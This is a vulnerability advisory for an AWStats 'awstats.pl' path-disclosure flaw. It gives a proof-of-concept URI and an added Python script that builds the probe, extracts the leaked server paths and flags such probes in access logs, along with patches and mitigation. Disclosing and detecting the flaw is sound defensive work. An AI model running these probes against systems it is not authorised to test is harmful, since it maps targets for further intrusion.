Written by r0t   
Wednesday, 18 March 2009 22:02
AWStats 'awstats.pl' Multiple Path Disclosure Vulnerability


-\\Bugtraq ID:
34159

-\\Class:
Design Error

-\\CVE:
CVE-2006-3682


-\\Remote:
Yes

-\\Local:
No

-\\Published:
Apr 19 2006 12:00AM

-\\Updated:
Mar 18 2009 05:56PM

-\\Credit:
r0t is credited with the discovery of this vulnerability.



-\\Vulnerable:
WebGUI WebGUI Runtime Environment 0.8.5
Ubuntu Ubuntu Linux 5.10 sparc
Ubuntu Ubuntu Linux 5.10 powerpc
Ubuntu Ubuntu Linux 5.10 i386
Ubuntu Ubuntu Linux 5.10 amd64
Ubuntu Ubuntu Linux 5.04 powerpc
Ubuntu Ubuntu Linux 5.04 i386
Ubuntu Ubuntu Linux 5.04 amd64
Ubuntu Ubuntu Linux 6.06 LTS sparc
Ubuntu Ubuntu Linux 6.06 LTS powerpc
Ubuntu Ubuntu Linux 6.06 LTS i386
Ubuntu Ubuntu Linux 6.06 LTS amd64
AWStats AWStats 6.5 build 1.857
AWStats AWStats 6.4
AWStats AWStats 6.3
AWStats AWStats 6.2
AWStats AWStats 6.1
AWStats AWStats 6.0
AWStats AWStats 5.9
AWStats AWStats 5.8
AWStats AWStats 5.7
AWStats AWStats 5.6
AWStats AWStats 5.5
AWStats AWStats 5.4
AWStats AWStats 5.3
AWStats AWStats 5.2
AWStats AWStats 5.1
AWStats AWStats 5.0
AWStats AWStats 4.0
+ Debian Linux 3.0 sparc
+ Debian Linux 3.0 s/390
+ Debian Linux 3.0 ppc
+ Debian Linux 3.0 mipsel
+ Debian Linux 3.0 mips
+ Debian Linux 3.0 m68k
+ Debian Linux 3.0 ia-64
+ Debian Linux 3.0 ia-32
+ Debian Linux 3.0 hppa
+ Debian Linux 3.0 arm
+ Debian Linux 3.0 alpha
+ Debian Linux 3.0



-\\Not Vulnerable:
WebGUI WebGUI Runtime Environment  0.9



-\\Discussion
AWStats is prone to a path-disclosure vulnerability. When 'awstats.pl' is passed a 'config' parameter that names a configuration file it cannot find, the script aborts with an error message that lists the server-side directories it searched, revealing the filesystem layout of the installation to the client.

Exploiting this issue lets a remote attacker learn installation and configuration paths. That information is not directly damaging by itself, but it removes guesswork from further attacks against a vulnerable computer.

The following are vulnerable:

AWStats 6.5 (build 1.857) and prior
WebGUI Runtime Environment 0.8.x and prior (which ships awstats.pl)



-\\Exploit(s)/PoC(s):
Attackers can exploit this issue via a browser or any HTTP client.

The following proof-of-concept URI requests a configuration file that does not exist (the name 'HACKdestailleur.fr' is arbitrary; any unused value works) and so triggers the error message that contains the search paths:

http://www.example.com/awstats/awstats.pl?config=HACKdestailleur.fr
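The check above, worked through in code. This is an added example, not code from the original advisory, from r0t or from the AWStats project: it builds the proof-of-concept URI, extracts any leaked paths from the response, and, going one step beyond the advisory, shows the defender's side by flagging probes for non-existent config files in a web access log. No network request is made; the response body and the log lines are constructed samples modelled on the error text awstats.pl prints for a missing config file, and the host 'www.example.com' and the `known_configs` set are assumptions.

```python
"""
Added example (not part of the original advisory or of AWStats): reproduces
the path-disclosure check described above and parses the leaked paths, then
shows the defender's side, flagging probes for non-existent config files in
an access log. No network request is made: the response body and the log
lines below are constructed samples modelled on AWStats' behaviour.
"""
import re
from urllib.parse import parse_qs, urlencode, urljoin

# Constructed sample of the error AWStats returns for a missing config file
# (not captured from a real host). The quoted search path is the disclosure.
SAMPLE_RESPONSE = """<html><body>
<b>Error:</b> Couldn't open config file "awstats.HACKdestailleur.fr.conf" nor
"awstats.conf" after searching in path "/etc/opt/awstats,/etc/awstats,/etc,/usr/local/etc/awstats,/usr/local/etc/awstats,.":
No such file or directory
<br><br>Check config file, permissions and AWStats documentation (in 'docs' directory).
</body></html>"""

# Constructed CLF access-log lines (not real traffic): one legitimate request
# for the site's own config, one probe with an arbitrary name, one unrelated hit.
SAMPLE_LOG = """\
203.0.113.7 - - [18/Mar/2009:22:02:11 +0000] "GET /awstats/awstats.pl?config=www.example.com HTTP/1.1" 200 18231
203.0.113.9 - - [18/Mar/2009:22:02:15 +0000] "GET /awstats/awstats.pl?config=HACKdestailleur.fr HTTP/1.1" 200 612
203.0.113.9 - - [18/Mar/2009:22:02:16 +0000] "GET /index.html HTTP/1.1" 200 1204
"""

# AWStats-specific: the comma-separated list it quotes after this phrase.
_SEARCH_PATH_RE = re.compile(r'after searching in path\s+"([^"]+)"', re.I)
# Generic fallback: absolute Unix paths, excluding "://host/" and "</tag>".
_ABS_PATH_RE = re.compile(r'(?<![:\w/<])/(?:[\w.-]+/)*[\w.-]+')
# The request line of an awstats.pl hit in a CLF/combined log line.
_REQ_RE = re.compile(r'"GET\s+\S*awstats\.pl\?([^ "]*)')


def build_probe_url(base_url: str, marker: str = "HACKdestailleur.fr") -> str:
    """Probe URI from the advisory: 'config' names a file that cannot exist,
    so awstats.pl falls through to its error path. `marker` is arbitrary."""
    script = urljoin(base_url.rstrip("/") + "/", "awstats.pl")
    return script + "?" + urlencode({"config": marker})


def find_disclosed_paths(body: str) -> list[str]:
    """Return the unique absolute paths leaked in an awstats.pl response.

    The AWStats error phrase is parsed first; the generic regex catches any
    other absolute path the page may include. An empty list means no leak."""
    paths = set()
    m = _SEARCH_PATH_RE.search(body)
    if m:
        paths.update(p.strip() for p in m.group(1).split(",")
                     if p.strip().startswith("/"))
    paths.update(_ABS_PATH_RE.findall(body))
    return sorted(paths)


def flag_unknown_configs(log_text: str, known_configs: set[str]) -> list[str]:
    """Defender side: return log lines requesting awstats.pl with a 'config'
    value the site does not serve. Each is a deliberate trip of the error
    path and therefore a path-disclosure probe worth alerting on."""
    flagged = []
    for line in log_text.splitlines():
        m = _REQ_RE.search(line)
        if not m:
            continue
        for cfg in parse_qs(m.group(1)).get("config", []):
            if cfg not in known_configs:
                flagged.append(line)
                break
    return flagged


if __name__ == "__main__":
    print("probe:", build_probe_url("http://www.example.com/awstats/"))
    print("leaked:", find_disclosed_paths(SAMPLE_RESPONSE))
    for hit in flag_unknown_configs(SAMPLE_LOG, {"www.example.com"}):
        print("probe seen:", hit)
```

To test a real host, fetch `build_probe_url(...)` with any HTTP client and pass the body to `find_disclosed_paths`; a non-empty result means the installation still discloses its search paths. On the defending side, the `known_configs` set should be the list of awstats.*.conf files actually deployed, so that every other 'config' value in the log is treated as a probe.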



-\\Solution
Updates are available. Please see the references for more information. Until the update is applied, restricting access to awstats.pl (for example with web-server authentication or an IP allow-list) keeps its error messages away from arbitrary remote clients.


AWStats AWStats 6.3
--Ubuntu awstats_6.3-1ubuntu0.4_all.deb
Ubuntu 5.04:
http://security.ubuntu.com/ubuntu/pool/main/a/awstats/awstats_6.3-1ubuntu0.4_all.deb

AWStats AWStats 6.4
--Ubuntu awstats_6.4-1ubuntu1.3_all.deb
Ubuntu 5.10:
http://security.ubuntu.com/ubuntu/pool/main/a/awstats/awstats_6.4-1ubuntu1.3_all.deb



-\\Reference(s)
--AWStats Homepage
http://awstats.sourceforge.net (AWStats)
--Security issue - Awstats.pl reveals server info on error (#8964)
http://www.plainblack.com/bugs/tracker/896 (WebGUI)